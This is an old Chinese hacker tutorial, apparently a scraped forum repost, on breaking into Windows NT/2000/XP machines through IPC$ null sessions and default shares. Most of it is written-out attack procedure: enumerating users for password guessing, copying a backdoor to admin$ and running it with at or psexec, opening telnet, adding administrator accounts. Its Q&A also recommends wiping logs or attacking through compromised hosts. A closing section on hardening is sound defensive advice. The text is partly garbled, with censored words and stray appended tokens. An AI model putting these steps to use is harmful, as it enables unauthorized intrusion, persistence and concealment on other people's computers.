hacker start.................

1,ping一下,若是返回的TTL在0和100之間,表示是windows主機,若是在200和300之間,表示是linux和unix主機。linux

2,***跳板技術ios

3,PC$(Internet Process Connection)是共享"命名管道"的資源,它是爲了讓進程間通訊而開放的命名管道,經過提供可信任的用戶名和口令,鏈接雙方能夠創建安全的通道並以此通道進行加密數據的交換,從而實現對遠程計算機的訪問。IPC$是NT/2000的一項新功能,它有一個特色,即在同一時間內,兩個IP之間只容許創建一個鏈接。NT/2000在提供了ipc$功能的同時,在初次安裝系統時還打開了默認共享,即全部的邏輯共享(c$,d$,e$……)和系統目錄winnt或windows(admin$)共享。全部的這些,微軟的初衷都是爲了方便管理員的管理,但在有意無心中,致使了系 統安全性的下降。
平時咱們總能聽到有人在說ipc$漏洞,ipc$漏洞,其實ipc$並非一個真正意義上的漏洞,我想之因此有人這麼說,必定是指微軟本身安置的那個‘後門’:空會話(Null session)。那麼什麼是空會話呢?
三 什麼是空會話
在介紹空會話以前,咱們有必要了解一下一個安全會話是如何創建的。
在Windows NT 4.0中是使用挑戰響應協議與遠程機器創建一個會話的,創建成功的會話將成爲一個安全隧道,創建雙方經過它互通訊息,這個過程的大體順序以下:
1)會話請求者(客戶)向會話接收者(服務器)傳送一個數據包,請求安全隧道的建
立;
2)服務器產生一個隨機的64位數(實現挑戰)傳送回客戶;
3)客戶取得這個由服務器產生的64位數,用試圖創建會話的賬號的口令打亂它,將結
果返回到服務器(實現響應);
4)服務器接受響應後發送給本地安全驗證(LSA),LSA經過使用該用戶正確的口令來覈實響應以便確認請求者身份。若是請求者的賬號是服務器的本地賬號,覈實本地發生;若是請求的賬號是一個域的賬號,響應傳送到域控制器去核實。當對挑戰的響應覈實爲正確 後,一個訪問令牌產生,而後傳送給客戶。客戶使用這個訪問令牌鏈接到服務器上的資源直到建議的會話被終止。
以上是一個安全會話創建的大體過程,那麼空會話又如何呢?
空會話是在沒有信任的狀況下與服務器創建的會話(即未提供用戶名與密碼),但根據WIN2000的訪問控制模型,空會話的創建一樣須要提供一個令牌,但是空會話在創建過程當中並無通過用戶信息的認證,因此這個令牌中不包含用戶信息,所以,這個會話不能讓系 統間發送加密信息,但這並不表示空會話的令牌中不包含安全標識符SID(它標識了用戶和所屬組),對於一個空會話,LSA提供的令牌的SID是S-1-5-7,這就是空會話的SID,用戶名是:ANONYMOUS LOGON(這個用戶名是能夠在用戶列表中看到的,可是是不能在SAM數據庫中找到,屬於系統內置的賬號),這個訪問令牌包含下面假裝的組:
Everyone
Network
在安全策略的限制下,這個空會話將被受權訪問到上面兩個組有權訪問到的一切信息。那麼創建空會話到底能夠做什麼呢?
四 空會話能夠作什麼
對於NT,在默認安全設置下,藉助空鏈接能夠列舉目標主機上的用戶和共享,訪問everyone權限的共享,訪問小部分註冊表等,並無什麼太大的利用價值;對2000做用更小,由於在Windows 2000 和之後版本中默認只有管理員和備份#做員有權從網絡訪問到註冊表,並且實現起來也不方便,需藉助工具。
從這些咱們能夠看到,這種非信任會話並無多大的用處,但從一次完整的ipc$***來看,空會話是一個不可缺乏的跳板,由於咱們從它那裏能夠獲得戶列表,而大多數弱口令掃描工具就是利用這個用戶列表來進行口令猜解的,成功的導出用戶列表大大增長了猜解的成 功率,僅從這一點,足以說明空會話所帶來的安全隱患,所以說空會話毫無用處的說法是不正確的。如下是空會話中可以使用的一些具體命令:
1 首先,咱們先創建一個空鏈接(固然,這須要目標開放ipc$)
命令:net use \\ip\ipc$ "" /user:""
注意:上面的命令包括四個空格,net與use中間有一個空格,use後面一個,密碼左右各一個空格。
2 查看遠程主機的共享資源
命令:net view \\ip
解釋:前提是創建了空鏈接後,用此命令能夠查看遠程主機的共享資源,若是它開了共享,能夠獲得以下面的結果,但此命令不能顯示默認共享。
在 \\*.*.*.*的共享資源
資源共享名 類型 用途 註釋
-----------------------------------------------------------
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
命令成功完成。
3 查看遠程主機的當前時間
命令: net time \\ip
解釋:用此命令能夠獲得一個遠程主機的當前時間。
4 獲得遠程主機的NetBIOS用戶名列表(須要打開本身的NBT)
命令:nbtstat -A ip
用此命令能夠獲得一個遠程主機的NetBIOS用戶名列表,返回以下結果:
Node IpAddress: [*.*.*.*] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
SERVER UNIQUE Registered
OYAMANISHI-H GROUP Registered
OYAMANISHI-H GROUP Registered
SERVER UNIQUE Registered
OYAMANISHI-H UNIQUE Registered
OYAMANISHI-H GROUP Registered
SERVER UNIQUE Registered
OYAMANISHI-H UNIQUE Registered
..__M##ROWSE__. GROUP Registered
INet~Services GROUP Registered
IS~SERVER...... UNIQUE Registered
MAC Address = 00-50-8B-9A-2D-37
以上就是咱們常用空會話作的事情,好像也能得到很多東西喲,不過要注意一點:創建IPC$鏈接的#做會在Event Log中留下記錄,無論你是否登陸成功。 好了,那麼下面咱們就來看看ipc$所使用的端口是什麼?
五 ipc$所使用的端口
首先咱們來了解一些基礎知識:
1 SMB: (Server Message Block) Windows協議族,用於文件打印共享的服務;
2 NBT: (NETBios Over TCP/IP)使用137(UDP)138(UDP)139(TCP)端口實現基於TCP/IP協議的NETBIOS網絡互聯。
3 在WindowsNT中SMB基於NBT實現,即便用139(TCP)端口;而在Windows2000中,SMB除了基於NBT實現,還能夠直接經過445端口實現。
有了這些基礎知識,咱們就能夠進一步來討論訪問網絡共享對端口的選擇了:
對於win2000客戶端(發起端)來講:
1 若是在容許NBT的狀況下鏈接服務器時,客戶端會同時嘗試訪問139和445端口,若是445端口有響應,那麼就發送RST包給139端口斷開鏈接,用455端口進行會話,當445端口無響應時,才使用139端口,若是兩個端口都沒有響應,則會話失敗;
2 若是在禁止NBT的狀況下鏈接服務器時,那麼客戶端只會嘗試訪問445端口,若是445端口無響應,那麼會話失敗。
對於win2000服務器端來講:
1 若是容許NBT, 那麼UDP端口137, 138, TCP 端口 139, 445將開放(LISTENING);
2 若是禁止NBT,那麼只有445端口開放。
咱們創建的ipc$會話對端口的選擇一樣遵照以上原則。顯而易見,若是遠程服務器沒有監聽139或445端口,ipc$會話是沒法創建的。
六 ipc管道在hack***中的意義
ipc管道原本是微軟爲了方便管理員進行遠程管理而設計的,但在***者看來,開放ipc管道的主機彷佛更容易得手。經過ipc管道,咱們能夠遠程調用一些系統函數(大多經過工具實現,但須要相應的權限),這每每是***成敗的關鍵。若是不考慮這些,僅從傳送 文件這一方面,ipc管道已經給了***者莫大的支持,甚至已經成爲了最重要的傳輸手段,所以你總能在各大論壇上看到一些朋友由於打不開目標機器的ipc管道而束手無策大呼救命。固然,咱們也不能忽視權限在ipc管道中扮演的重要角色,想必你必定品嚐過空會 話的尷尬,沒有權限,開啓管道咱們也迫不得已。但***者一旦得到了管理員的權限,那麼ipc管道這把雙刃劍將顯示出它猙獰的一面。
七 ipc$鏈接失敗的常見緣由
如下是一些常見的致使ipc$鏈接失敗的緣由:
1 IPC鏈接是Windows NT及以上系統中特有的功能,因爲其須要用到Windows NT中不少DLL函數,因此不能在Windows 9.x/Me系統中運行,也就是說只有nt/2000/xp才能夠相互創建ipc$鏈接,98/me是不能創建ipc$鏈接的;
2 若是想成功的創建一個ipc$鏈接,就須要響應方開啓ipc$共享,即便是空鏈接也是這樣,若是響應方關閉了ipc$共享,將不能創建鏈接;
3 鏈接發起方未啓動Lanmanworkstation服務(顯示名爲:Workstation):它提供網絡鏈結和通信,沒有它發起方沒法發起鏈接請求;
4 響應方未啓動Lanmanserver服務(顯示名爲:Server):它提供了 RPC 支持、文件、打印以及命名管道共享,ipc$依賴於此服務,沒有它主機將沒法響應發起方的鏈接請求,不過沒有它仍可發起ipc$鏈接;
5 響應方未啓動NetLogon,它支持網絡上計算機 pass-through 賬戶登陸身份(不過這種狀況好像很少);
6 響應方的139,445端口未處於監聽狀態或被防火牆屏蔽;
7 鏈接發起方未打開139,445端口;
8 用戶名或者密碼錯誤:若是發生這樣的錯誤,系統將給你相似於''沒法更新密碼''這樣的錯誤提示(顯然空會話排除這種錯誤);
9 命令輸入錯誤:可能多了或少了空格,當用戶名和密碼中不包含空格時兩邊的雙引號能夠省略,若是密碼爲空,能夠直接輸入兩個引號""便可;
10 若是在已經創建好鏈接的狀況下對方重啓計算機,那麼ipc$鏈接將會自動斷開,須要從新創建鏈接。
另外,你也能夠根據返回的錯誤號分析緣由:
錯誤號5,拒絕訪問:極可能你使用的用戶不是管理員權限的;
錯誤號51,Windows沒法找到網絡路徑:網絡有問題;
錯誤號53,找不到網絡路徑:ip地址錯誤;目標未開機;目標lanmanserver服務未啓動;目標有防火牆(端口過濾);
錯誤號67,找不到網絡名:你的lanmanworkstation服務未啓動或者目標刪除了ipc$;
錯誤號1219,提供的憑據與已存在的憑據集衝突:你已經和對方創建了一個ipc$,請刪除再連;
錯誤號1326,未知的用戶名或錯誤密碼:緣由很明顯了;
錯誤號1792,試圖登陸,可是網絡登陸服務沒有啓動:目標NetLogon服務未啓動;
錯誤號2242,此用戶的密碼已通過期:目標有賬號策略,強制按期要求更改密碼。
八 複製文件失敗的緣由
有些朋友雖然成功的創建了ipc$鏈接,但在copy時卻遇到了這樣那樣的麻煩,沒法複製成功,那麼致使複製失敗的常見緣由又有哪些呢?
1 對方未開啓共享文件夾
這類錯誤出現的最多,佔到50%以上。許多朋友在ipc$鏈接創建成功後,甚至都不知道對方是否有共享文件夾,就進行盲目複製,結果致使複製失敗並且鬱悶的很。所以我建議你們在進行復制以前務必用net view \\IP這個命令看一下你想要複製的共享文件夾是否存在(用軟件查看固然更好),不要認爲能創建ipc$鏈接就必定有共享文件夾存在。
2 向默認共享複製失敗
這類錯誤也是你們常常犯的,主要有兩個小方面:
1)錯誤的認爲能創建ipc$鏈接的主機就必定開啓了默認共享,於是在創建完鏈接以後立刻向c$,d$,admin$之類的默認共享複製文件,一旦對方未開啓默認共享,將致使複製失敗。ipc$鏈接成功只能說明對方打開了ipc$共享,並不能說明默認共享 必定存在。ipc$共享與默認共享是兩碼事,ipc$共享是一個命名管道,並非哪一個實際的文件夾,而默認共享倒是實實在在的共享文件夾;
2)因爲net view \\IP 這個命令沒法顯示默認共享文件夾(由於默認共享帶$),所以經過這個命令,咱們並不能判斷對方是否開啓了默認共享,所以若是對方未開啓默認共享,那麼全部向默認共享進行的#做都不能成功;(不過大部分掃描軟件在掃弱口令的同時,都能掃到默認共享目錄,能夠 避免此類錯誤的發生)
要點:請你們必定區分ipc共享,默認共享,普通共享這三者的區別:ipc共享是一個管道,並非實際的共享文件夾;默認共享是安裝時默認打開的文件夾;普通共享是咱們本身開啓的能夠設置權限的共享文件夾。
3用戶權限不夠,包括四種情形:
1)空鏈接向全部共享(默認共享和普通共享)複製時,權限是不夠的;
2)向默認共享複製時,在Win2000 Pro版中,只有Administrators和Backup Operators組成員才能夠,在Win2000 Server版本 Server Operatros組也能夠訪問到這些共享目錄;
3)向普通共享複製時,要具備相應權限(即對方管理員事先設定的訪問權限);
4)對方能夠經過防火牆或安全軟件的設置,禁止外部訪問共享;
注意:
1 不要認爲administrator就必定具備管理員權限,管理員名稱是能夠改的
2 管理員能夠訪問默認共享的文件夾,但不必定可以訪問普通的共享文件夾,由於管理員能夠對普通的共享文件夾進行訪問權限設置,如圖6,管理員爲D盤設置的訪問權限爲僅容許名爲xinxin的用戶對該文件夾進行徹底訪問,那麼此時即便你擁有管理員權限,你仍然 不能訪問D盤。不過有意思的是,若是此時對方又開啓了D$的默認共享,那麼你卻能夠訪問D$,從而繞過了權限限制,有興趣的朋友能夠本身作測試。
4被防火牆殺死或在局域網
還有一種狀況,那就是也許你的複製#做已經成功,但當遠程運行時,被防火牆殺掉了,致使找不到文件;或者你把***複製到了局域網內的主機,致使鏈接失敗(反向鏈接的***不會發生這種狀況)。若是你沒有想到這種狀況,你會覺得是複製上出了問題,但實際你的復 制#做已經成功了,只是運行時出了問題。
呵呵,你們也知道,ipc$鏈接在實際#做過程當中會出現各類各樣的問題,上面我所總結的只是一些常見錯誤,沒說到的,你們能夠給我提個醒兒。
九 關於at命令和xp對ipc$的限制
原本還想說一下用at遠程運行程序失敗的緣由,但考慮到at的成功率不是很高,問題也不少,在這裏就不提它了(提的越多,用的人就越多),而是推薦你們用p***ec.exe遠程運行程序,假設想要遠程機器執行本地c:\xinxin.exe文件,且管理 員爲administrator,密碼爲1234,那麼輸入下面的命令:
p***ec \\ip -u administrator -p 1234 -c c:\xinxin.exe
若是已經創建ipc鏈接,則-u -p這兩個參數不須要,p***ec.exe將自動拷貝文件到遠程機器並運行。
原本xp中的ipc$也不想在這裏討論,想單獨拿出來討論,但看到愈來愈多的朋友很急切的提問爲何遇到xp的時候,大部分#做都很難成功。我在這裏就簡單提一下吧,在xp的默認安全選項中,任何遠程訪問僅被賦予來賓權限,也就是說即便你是用管理員賬戶和 密碼,你所獲得的權限也只是Guest,所以大部分#做都會由於權限不夠而失敗,並且到目前爲止並無一個好的辦法來突破這一限制。因此若是你真的獲得了xp的管理員密碼,我建議你儘可能避開ipc管道。
十 如何打開目標的IPC$共享以及其餘共享
目標的ipc$不是輕易就能打開的,不然就要天下打亂了。你須要一個admin權限的shell,好比telnet,***,cmd重定向等,而後在shell下執行:
net share ipc$
開放目標的ipc$共享;
net share ipc$ /del
關閉目標的ipc$共享;若是你要給它開共享文件夾,你能夠用:
net share xinxin=c:\
這樣就把它的c盤開爲共享名爲xinxin共享文件夾了。(但是我發現不少人錯誤的認爲開共享文件夾的命令是net share c$,還大模大樣的給菜鳥指指點點,真是誤人子弟了)。再次聲明,這些#做都是在shell下才能實現的。
十一 一些須要shell才能完成的命令
看到不少教程這方面寫的十分不許確,一些須要shell才能完成命令就簡簡單單的在ipc$鏈接下執行了,起了誤導做用。那麼下面我總結一下須要在shell才能完成的命令:
1 向遠程主機創建用戶,激活用戶,修改用戶密碼,加入管理組的#做須要在shell下完成;
2 打開遠程主機的ipc$共享,默認共享,普通共享的#做須要在shell下完成;
3 運行/關閉遠程主機的服務,須要在shell下完成;
4 啓動/殺掉遠程主機的進程,也須要在shell下完成(用軟件的狀況下除外,如pskill)。
十二 ***中可能會用到的命令
爲了這份教程的完整性,我列出了ipc$***中的一些經常使用命令,若是你已經掌握了這些命令,你能夠跳過這一部分看下面的內容。請注意這些命令是適用於本地仍是遠程,若是隻適用於本地,你只能在得到遠程主機的shell(如cmd,telnet等)後,才能 向遠程主機執行。
1 創建/刪除ipc$鏈接的命令
1)創建空鏈接:
net use \\127.0.0.1\ipc$ "" /user:""
2)創建非空鏈接:
net use \\127.0.0.1\ipc$ "密碼" /user:"用戶名"
3)刪除鏈接:
net use \\127.0.0.1\ipc$ /del
2 在ipc$鏈接中對遠程主機的#做命令
1) 查看遠程主機的共享資源(看不到默認共享):
net view \\127.0.0.1
2) 查看遠程主機的當前時間:
net time \\127.0.0.1
3) 獲得遠程主機的netbios用戶名列表:
nbtstat -A 127.0.0.1
4)映射/刪除遠程共享:
net use z: \\127.0.0.1\c
此命令將共享名爲c的共享資源映射爲本地z盤
net use z: /del
刪除映射的z盤,其餘盤類推
5)向遠程主機複製文件:
copy 路徑\文件名 \\IP\共享目錄名,如:
copy c:\xinxin.exe \\127.0.0.1\c$ 即將c盤下的xinxin.exe複製到對方c盤內
固然,你也能夠把遠程主機上的文件複製到本身的機器裏:
copy \\127.0.0.1\c$\xinxin.exe c:\
6)遠程添加計劃任務:
at \\IP 時間 程序名 如:
at \\127.0.0.0 11:00 xinxin.exe
注意:時間儘可能使用24小時制;若是你打算運行的程序在系統默認搜索路徑(好比system32/)下則不用加路徑,不然必須加全路徑
3 本地命令
1)查看本地主機的共享資源(能夠看到本地的默認共享)
net share
2)獲得本地主機的用戶列表
net user
3)顯示本地某用戶的賬戶信息
net user 賬戶名
4)顯示本地主機當前啓動的服務
net start
5)啓動/關閉本地服務
net start 服務名
net stop 服務名
6)在本地添加賬戶
net user 賬戶名 密碼 /add
7)激活禁用的用戶
net uesr 賬戶名 /active:yes
8)加入管理員組
net localgroup administrators 賬戶名 /add
很顯然的是,雖然這些都是本地命令,但若是你在遠程主機的shell中輸入,好比你telnet成功後輸入上面這些命令,那麼這些本地輸入將做用在遠程主機上。
4 其餘一些命令
1)telnet
telnet IP 端口
telnet 127.0.0.0 23
2)用opentelnet.exe開啓遠程主機的telnet
OpenTelnet.exe \\ip 管理員賬號 密碼 NTLM的認證方式 port
OpenTelnet.exe \\127.0.0.1 administrator "" 1 90
不過這個小工具須要知足四個要求:
1)目標開啓了ipc$共享
2)你要擁有管理員密碼和賬號
3)目標開啓RemoteRegistry服務,用戶就能夠更改ntlm認證
4)對僅WIN2K/XP有效
3)用p***ec.exe一步得到shell,須要ipc管道支持
p***ec.exe \\IP -u 管理員賬號 -p 密碼 cmd
p***ec.exe \\127.0.0.1 -u administrator -p "" cmd
十三 對比過去和現今的ipc$***
既然是對比,那麼我就先把過去的ipc$***步驟寫給你們,都是蠻經典的步驟:
[1]
C:\>net use \\127.0.0.1\ipc$ "" /user:admintitrators
\\用掃到的空口令創建鏈接  
[2]
c:\>net view \\127.0.0.1
\\查看遠程的共享資源
[3]
C:\>copy srv.exe \\127.0.0.1\admin$\system32
\\將一次性後門srv.exe複製到對方的系統文件夾下,前提是admin$開啓  
[4]
C:\>net time \\127.0.0.1
\\查看遠程主機的當前時間
[5]
C:\>at \\127.0.0.1 時間 srv.exe
\\用at命令遠程運行srv.exe,須要對方開啓了''Task Scheduler''服務  
[6]
C:\>net time \\127.0.0.1
\\再次查看當前時間來估算srv.exe是否已經運行,此步能夠省略
[7]    
C:\>telnet 127.0.0.1 99
\\開一個新窗口,用telnet遠程登錄到127.0.0.1從而得到一個shell(不懂shell是什麼意思?那你就把它想象成遠程機器的控制權就行了,#做像DOS),99端口是srv.exe開的一次性後門的端口  
[8]
C:\WINNT\system32>net start telnet
\\咱們在剛剛登錄上的shell中啓動遠程機器的telnet服務,畢竟srv.exe是一次性的後門,咱們須要一個長久的後門便於之後訪問,若是對方的telnet已經啓動,此步可省略
[9]
C:\>copy ntlm.exe \\127.0.0.1\admin$\system32
\\在原來那個窗口中將ntlm.exe傳過去,ntlm.exe是用來更改telnet身份驗證的  
[10]
C:\WINNT\system32>ntlm.exe
\\在shell窗口中運行ntlm.exe,之後你就能夠暢通無阻的telnet這臺主機了
[11]
C:\>telnet 127.0.0.1 23
\\在新窗口中telnet到127.0.0.1,端口23可省略,這樣咱們又得到一個長期的後門
[12]
C:\WINNT\system32>net user 賬戶名 密碼 /add
C:\WINNT\system32>net uesr guest /active:yes
C:\WINNT\system32>net localgroup administrators 賬戶名 /add
\\telnet上之後,你能夠創建新賬戶,激活guest,把任何賬戶加入管理員組等
好了,寫到這裏我彷佛回到了2,3年前,那時的ipc$你們都是這麼用的,不過隨着新工具的出現,上面提到的一些工具和命令如今已經不經常使用到了,那就讓咱們看看如今的高效而簡單的ipc$***吧。
[1]
p***ec.exe \\IP -u 管理員賬號 -p 密碼 cmd
\\用這個工具咱們能夠一步到位的得到shell
OpenTelnet.exe \\server 管理員賬號 密碼 NTLM的認證方式 port
\\用它能夠方便的更改telnet的驗證方式和端口,方便咱們登錄
[2]
已經沒有第二步了,用一步得到shell以後,你作什麼均可以了,安後門能夠用winshell,克隆就用ca吧,開終端用3389.vbe,記錄密碼用win2kpass,總之好的工具很多,隨你選了,我就很少說了。
十四 如何防範ipc$***察看本地共享資源
運行-cmd-輸入net share
刪除共享(每次輸入一個)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(若是有e,f,……能夠繼續刪除)
1 禁止空鏈接進行枚舉(此#做並不能阻止空鏈接的創建)
運行regedit,找到以下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的鍵值改成:1
若是設置爲"1",一個匿名用戶仍然能夠鏈接到IPC$共享,但沒法經過這種鏈接獲得列舉SAM賬號和共享信息的權限;在Windows 2000 中增長了"2",未取得匿名權的用戶將不能進行ipc$空鏈接。建議設置爲1。若是上面所說的主鍵不存在,就新建一個再改鍵值。若是你以爲改註冊表麻煩,能夠在本地安全設置中設置此項: 在本地安全設置-本地策略-安全選項-''對匿名鏈接的額外限制''
2 禁止默認共享
1)察看本地共享資源
運行-cmd-輸入net share
2)刪除共享(重起後默認共享仍然存在)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(若是有e,f,……能夠繼續刪除)
3)中止server服務
net stop server /y (從新啓動後server服務會從新開啓)
4)禁止自動打開默認共享(此#做並不能關閉ipc$共享)
運行-regedit
server版:找到以下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的鍵值改成:00000000。
pro版:找到以下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的鍵值改成:00000000。
這兩個鍵值在默認狀況下在主機上是不存在的,須要本身手動添加,修改後重起機器使設置生效。
3 關閉ipc$和默認共享依賴的服務:server服務
若是你真的想關閉ipc$共享,那就禁止server服務吧:
控制面板-管理工具-服務-找到server服務(右擊)-屬性-常規-啓動類型-選已禁用,這時可能會有提示說:XXX服務也會關閉是否繼續,由於還有些次要的服務要依賴於server服務,不要管它。
4 屏蔽139,445端口
因爲沒有以上兩個端口的支持,是沒法創建ipc$的,所以屏蔽139,445端口一樣能夠阻止ipc$***。
1)139端口能夠經過禁止NBT來屏蔽
本地鏈接-TCP/IT屬性-高級-WINS-選‘禁用TCP/IT上的NETBIOS’一項
2)445端口能夠經過修改註冊表來屏蔽
添加一個鍵值
Hive: HKEY_LOCAL_MACHINE
Key: System\Controlset\Services\NetBT\Parameters
Name: SMBDeviceEnabled
Type: REG_DWORD
value: 0
修改完後重啓機器
注意:若是屏蔽掉了以上兩個端口,你將沒法用ipc$***別人。
3)安裝防火牆進行端口過濾
6 設置複雜密碼,防止經過ipc$窮舉出密碼,我以爲這纔是最好的辦法,加強安全意識,比不停的打補丁要安全的多。
十五 ipc$***問答精選
1.進行ipc$***的時候,會在服務器中留下記錄,有什麼辦法能夠不讓服務器發現嗎?
答:留下記錄是必定的,你走後用清除日誌程序刪除就能夠了,或者用肉雞***。
2.你看下面的狀況是爲何,能夠鏈接但不能複製
net use \\***.***.***.***\ipc$ "密碼" /user:"用戶名"
命令成功
copy icmd.exe \\***.***.***.***\admin$
找不到網絡路徑
命令不成功
答:像「找不到網絡路徑」「找不到網絡名」之類的問題,大可能是由於你想要複製到的共享文件夾沒有開啓,因此在複製的時候會出現錯誤,你能夠試着找找其餘的共享文件夾。
3.若是對方開了IPC$,且能創建空聯接,但打開C、D盤時,都要求密碼,我知道是空鏈接沒有太多的權限,但沒別的辦法了嗎?
答:建議先用流光或者別的什麼掃描軟件試着猜解一下密碼,若是猜不出來,只能放棄,畢竟空鏈接的能力有限。
4.我已經猜解到了管理員的密碼,且已經ipc$鏈接成功了,但net view \\ip發現它沒開默認共享,我該怎麼辦?
答:首先糾正你的一個錯誤,用net view \\ip是沒法看到默認共享的,你能夠試着將文件複製到c$,d$看看,若是都不行,說明他關閉了默認共享,那你就用opentelnet.exe或p***ec.exe吧,用法上面有。
5.ipc$鏈接成功後,我用下面的命令創建了一個賬戶,卻發現這個賬戶在我本身的機器上,這是怎麼回事?
net uset ccbirds /add
答:ipc$創建成功只能說明你與遠程主機創建了通訊隧道,並不意味你取得了一個shell,只有在得到一個shell(好比telnet)以後,你才能在遠程機器創建一個賬戶,不然你的#做只是在本地進行。
6.我已進入了一臺肉機,用的管理員賬號,能夠看他的系統時間,可是複製程序到他的機子上卻不行,每次都提示「拒絕訪問,已複製0個文件」,是否是對方有什麼服務沒開,我該怎麼辦?
答:通常來講「拒絕訪問」都是權限不夠的結果,多是你用的賬戶有問題,還有一種可能,若是你想向普通共享文件夾複製文件卻返回這個錯誤,說明這個文件夾設置的容許訪問用戶中不包括你(哪怕你是管理員),這一點我在上一期文章中分析了。
7.我用Win98能與對方創建ipc$鏈接嗎?
答:理論上不能夠,要進行ipc$的#做,建議用win2000,用其餘#做系統會帶來許多沒必要要的麻煩。
8.我用net use \\ip\ipc$ "" /user ""成功的創建了一個空會話,但用nbtstat -A IP 卻沒法導出用戶列表,這是爲何?
答:空會話在默認的狀況下是能夠導出用戶列表的,但若是管理員經過修改註冊表來禁止導出列表,就會出現你所說的狀況;還有多是你本身的NBT沒有打開,netstat命令是創建在NBT之上的。  
9.我創建ipc$鏈接的時候返回以下信息:‘提供的憑據與已存在的憑據集衝突’,怎麼回事?
答:呵呵,這說明你已經與目標主機創建了ipc$鏈接,兩個主機間同時創建兩個ipc$鏈接是不容許的。
10.我在映射的時候出現:
F:\>net use h: \\211.161.134.*\e$
系統發生 85 錯誤。
本地設備名已在使用中。這是怎麼回事?
答:你也太粗心了吧,這說明你有一個h盤了,映射到沒有的盤符吧!
11.我創建了一個鏈接f:\>net use \\*.*.*.*\ipc$ "123" /user:"guest" 成功了,但當我映射時出現了錯誤,向我要密碼,怎麼回事?
F:\>net use h: \\*.*.*.*\c$
密碼在 \\*.*.*.*\c$ 無效。
請鍵入 \\*.*.*.*\c$ 的密碼:
系統發生 5 錯誤。
拒絕訪問。
答:呵呵,向你要密碼說明你當前使用的用戶權限不夠,不能映射C$這個默認共享,想辦法提高權限或者找管理員的弱口令吧!默認共享通常是須要管理員權限的。
12.我用superscan掃到了一個開了139端口的主機,但爲何不能空鏈接呢?
答:你混淆了ipc$與139的關係,能進行ipc$鏈接的主機必定開了139或445端口,但開這兩個端口的主機可不必定能空鏈接,由於對方能夠關閉ipc$共享.
13.我門局域網裏的機器大多都是xp,我用流光掃描到幾個administrator賬號口令是空,並且能夠鏈接,但不能複製東西,說錯誤5。請問爲何?
答:xp的安全性要高一些,在安全策略的默認設置中,對本地賬戶的網絡登陸進行身份驗證的時候,默認爲來賓權限,即便你用管理員遠程登陸,也只具備來賓權限,所以你複製文件,固然是錯誤5:權限不夠。
14.我用net use \\192.168.0.2\ipc$ "password" /user:"administrator" 成功,但是 net use i: \\192.168.0.2\c
出現請鍵入 \\192.168.0.2 的密碼,怎麼回事情呢?我用的但是管理員呀?應該什麼均可以訪問呀?
答:雖然你具備管理員權限,但管理員在設置c盤共享權限時(注意:普通共享能夠設置訪問權限,而默認共享則不能)可能並未設置容許administrator訪問,因此會出現上述問題。
15.若是本身的機器禁止了ipc$, 是否是還能夠用ipc$鏈接別的機器?若是禁止server服務呢?
答:禁止以上兩項仍能夠發起ipc$鏈接,不過這種問題本身動手試驗會更好。
16.能告訴我下面的兩個錯誤產生的緣由嗎?
c:\>net time \\61.225.*.*
系統發生 5 錯誤。
拒絕訪問。
c:\>net view \\61.225.*.*
系統發生 5 錯誤。
拒絕訪問。
答:起初遇到這個問題的時候我也很納悶,錯誤5表示權限不夠,但是連空會話的權限均可以完成上面的兩個命令,他爲何不行呢?難道是他沒創建鏈接?後來那個粗心的同志告訴個人確是這樣,他忘記了本身已經刪了ipc$鏈接,以後他又輸入了上面那兩個命令,隨 之發生了錯誤5。
17.您看看這是怎麼回事?
F:\>net time
找不到時間服務器。
請鍵入 NET HELPMSG 3912 以得到更多的幫助。
答:答案很簡單,你的命令錯了,應該是net time \\ipshell

沒輸入ip地址,固然找不到服務器。view的命令也應該有ip地址,即:net view \\ip數據庫

相關文章
相關標籤/搜索